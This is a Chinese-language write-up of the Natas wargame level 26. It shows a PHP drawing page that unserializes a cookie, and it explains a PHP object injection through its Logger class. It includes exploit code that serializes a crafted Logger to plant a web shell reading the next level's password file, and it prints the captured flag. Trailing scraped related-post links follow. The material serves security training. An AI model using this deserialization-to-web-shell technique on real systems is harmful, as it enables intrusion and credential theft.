##源码:

<?php

    // sry, this is ugly as hell.

    // cheers kaliman ;)

    // - morla

    class Logger{

        private $logFile;

        private $initMsg;

        private $exitMsg;

        function __construct($file){

            // initialise variables

            $this->initMsg="#--session started--#\n";

            $this->exitMsg="#--session end--#\n";

            $this->logFile = "/tmp/natas26_" . $file . ".log";

            // write initial message

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$initMsg);

            fclose($fd);

        }                       

        function log($msg){

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$msg."\n");

            fclose($fd);

        }                       

        function __destruct(){

            // write exit message

            $fd=fopen($this->logFile,"a+");

            fwrite($fd,$this->exitMsg);

            fclose($fd);

        }

    }

    function showImage($filename){

        if(file_exists($filename))

            echo "<img src=\"$filename\">";

    }

    function drawImage($filename){

        $img=imagecreatetruecolor(400,300);

        drawFromUserdata($img);

        imagepng($img,$filename);

        imagedestroy($img);

    }

    function drawFromUserdata($img){

        if( array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $color=imagecolorallocate($img,0xff,0x12,0x1c);

            imageline($img,$_GET["x1"], $_GET["y1"],

                            $_GET["x2"], $_GET["y2"], $color);

        }

        if (array_key_exists("drawing", $_COOKIE)){

            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));

            if($drawing)

                foreach($drawing as $object)

                    if( array_key_exists("x1", $object) &&

                        array_key_exists("y1", $object) &&

                        array_key_exists("x2", $object) &&

                        array_key_exists("y2", $object)){

                        $color=imagecolorallocate($img,0xff,0x12,0x1c);

                        imageline($img,$object["x1"],$object["y1"],

                                $object["x2"] ,$object["y2"] ,$color);

                    }

        }

    }

    function storeData(){

        $new_object=array();

        if(array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET)){

            $new_object["x1"]=$_GET["x1"];

            $new_object["y1"]=$_GET["y1"];

            $new_object["x2"]=$_GET["x2"];

            $new_object["y2"]=$_GET["y2"];

        }

        if (array_key_exists("drawing", $_COOKIE)){

            $drawing=unserialize(base64_decode($_COOKIE["drawing"]));

        }

        else{

            // create new array

            $drawing=array();

        }

        $drawing[]=$new_object;

        setcookie("drawing",base64_encode(serialize($drawing)));

    }

?>

<h1>natas26</h1>

<div id="content">

Draw a line:<br>

<form name="input" method="get">

X1<input type="text" name="x1" size=2>

Y1<input type="text" name="y1" size=2>

X2<input type="text" name="x2" size=2>

Y2<input type="text" name="y2" size=2>

<input type="submit" value="DRAW!">

</form> 

<?php

    session_start();

    if (array_key_exists("drawing", $_COOKIE) ||

        (   array_key_exists("x1", $_GET) && array_key_exists("y1", $_GET) &&

            array_key_exists("x2", $_GET) && array_key_exists("y2", $_GET))){

        $imgfile="img/natas26_" . session_id() .".png";

        drawImage($imgfile);

        showImage($imgfile);

        storeData();

    }

?>

主要知识点参见PHP Object Injection(PHP对象注入)

思路上的问题:

了解PHP对象注入后,不知道该如何回显,以为这里没有eval和system等能够执行命令的语句(序列化又只能传入键值对(字符串而非执行语句))。其实很简单,这里不需要服务器端在解析的时候回显flag,我们只需要在能够访问的文件夹(imag\)下建立一个shell(fuck.php)(路径可以用字符串表示传入),写入php语句,然后访问该脚本,就能够进行任意语句执行/回显!

生成序列化的注入实体时犯的错误:

<?php

    class Logger{

        function __construct($file){

            $this->initMsg="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

            $this->logFile = "img/fuck3.php";

	    $this->exitMsg ="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

        }

    }

print urlencode(base64_encode(serialize(new Logger('asd'))));

?>

源码中声明Logger时进行了访问控制(三个属性全部私有),如果不加private的话是默认公有的,生成的序列化字节串会不匹配,要注意这一点,数据类型一定要匹配。(另外,序列话字节串只能保存键值对,无法保存对象中的方法定义)。

正确做法:

<?php

    class Logger{

	private $logFile;

        private $initMsg;

        private $exitMsg;

        function __construct($file){

            $this->initMsg="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

            $this->logFile = "img/fuck3.php";

	    $this->exitMsg ="<? \n\nsystem('cat /etc/natas_webpass/natas27'); ?>\n\n";

        }

    }

print urlencode(base64_encode(serialize(new Logger('asd'))));

?>

ps:其实还有个小问题,当前路径就写“img/....”即可,当时脑袋抽写成了"/imag/...."

然后访问img/fuck.php这个shell即可得到flag。

flag:**55TBjpPZUUJgVP5b3BnbG6ON9uDPVzCJ **

Natas Wargame Level26 Writeup(PHP对象注入)的更多相关文章

  1. Natas Wargame Level20 Writeup(会话状态注入/篡改)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArMAAACmCAYAAADJYwcaAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  2. Natas Wargame Level27 Writeup(SQL表的注入/溢出与截取)

    前端: <html> <head> <!-- This stuff in the header has nothing to do with the level --&g ...

  3. Natas Wargame Level25 Writeup(头部注入+POST/GET注入)

    aaarticlea/png;base64,iVBORw0KGgoAAAANSUhEUgAAArsAAAC8CAYAAAB4+WYTAAAABHNCSVQICAgIfAhkiAAAIABJREFUeF

  4. 转:Natas Wargame Level28 Writeup(EBC加密破解)

    From:http://alkalinesecurity.com/blog/ctf-writeups/natas-28-getting-it-wrong/ Now that I knew it was ...

  5. joomla \libraries\joomla\session\session.php 反序列化截断畸形字符串导致对象注入漏洞

    catalog . 漏洞描述 . PHP SESSION持久化 . PHP 序列化/反序列化内核实现 . 漏洞代码分析 . POC构造技巧 . 防御方案 . Code Pathc方案 1. 漏洞描述 ...

  6. struts2将servlet对象注入到Action中

    在struts2框架中,可以通过IoC方式将servlet对象注入到Action中,通常需要Action实现以下接口: a. ServletRequestAware: 实现该接口的Action可以直接 ...

  7. Codeigniter 利用加密Key(密钥)的对象注入漏洞

    http://drops.wooyun.org/papers/1449 原文链接:http://www.mehmetince.net/codeigniter-object-injection-vuln ...

  8. 深入理解PHP对象注入

    0x00 背景 php对象注入是一个非常常见的漏洞,这个类型的漏洞虽然有些难以利用,但仍旧非常危险,为了理解这个漏洞,请读者具备基础的php知识. 0x01 漏洞案例 如果你觉得这是个渣渣洞,那么请看 ...

  9. PHP对象注入 PHP Object Injection

    From:PHP Object Injection Last revision (mm/dd/yy): 01/7/2015 译者:李秋豪 Wednesday, 24. May 2017 05:48PM ...

随机推荐

  1. 基于 Aspose.Cells与XML导入excel 数据----操作类封装

    前言 导入excel数据, 在每个项目中基本上都会遇到,第三方插件或者基于微软office,用的最多的就是npoi,aspose.cells和c#基于office这三种方式,其中各有各的优缺点,在这也 ...

  2. Android 异步消息处理机制前篇(一):深入理解ThreadLocal

    版权声明:本文出自汪磊的博客,转载请务必注明出处. ThreadLocal简介 ThreadLocal是一个线程内部的数据存储类,通过它可以在指定的线程中存储数据,数据存储以后,只有在指定线程中可以获 ...

  3. 设计模式的征途—23.解释器(Interpreter)模式

    虽然目前计算机编程语言有好几百种,但有时人们还是希望用一些简单的语言来实现特定的操作,只需要向计算机输入一个句子或文件,就能按照预定的文法规则来对句子或文件进行解释.例如,我们想要只输入一个加法/减法 ...

  4. 【原创】使用workstation安装Xenserver 6.5+cloudstack 4.10----本地存储模式

    1. 背景: 近期由于项目和个人学习得需求,开始接触到Cloudstack,虽然云计算概念在大学刚毕业的时候就已经略有耳闻,但是由于工作原因,也一直没有了解,下班后想自己折腾下cloudstack,便 ...

  5. STM32基础问题分析——PWM配置

    STM32基础问题分析--PWM配置 在使用STM32F103产生固定频率.固定占空比的PWM波时,虽然有官方以及众多开发板提供的例程,但是关于有点问题并没有说的很清晰,并且<STM32F10X ...

  6. 35.Linux-分析并制作环形缓冲区

    在上章34.Linux-printk分析.使用printk调试驱动里讲述了: printk()会将打印信息存在内核的环形缓冲区log_buf[]里, 可以通过dmesg命令来查看log_buf[] 1 ...

  7. Mac关机时处于黑屏状态

    PS:不知道大家有没有遇到过mac电脑关机就黑屏,只有一个箭头,还可以滑动箭头,但就是黑屏状态,等个好长时间还是关不了机,因此我查了好多资料,原因是在关机时,mac要先关掉其他软件或者保存进程以备下次 ...

  8. mysql如何查看索引使用情况以及优化 - guols0612

    mysql中支持hash和btree索引.innodb和myisam只支持btree索引,而memory和heap存储引擎可以支持hash和btree索引 我们可以通过下面语句查询当前索引使用情况: ...

  9. mysql复习秘籍

    mysql复习 一:复习前的准备 1:确认你已安装wamp 2:确认你已安装ecshop,并且ecshop的数据库名为shop 二 基础知识: 1.数据库的连接 mysql -u -p -h -u 用 ...

  10. CentOS6 图形界面(gnome)安装,使用vnc进行远程连接

    CentOS6相对于CentOS5的安装有了不少的进步,有不少默认的选项可以选择,如: Desktop :基本的桌面系统,包括常用的桌面软件,如文档查看工具. Minimal Desktop :基本的 ...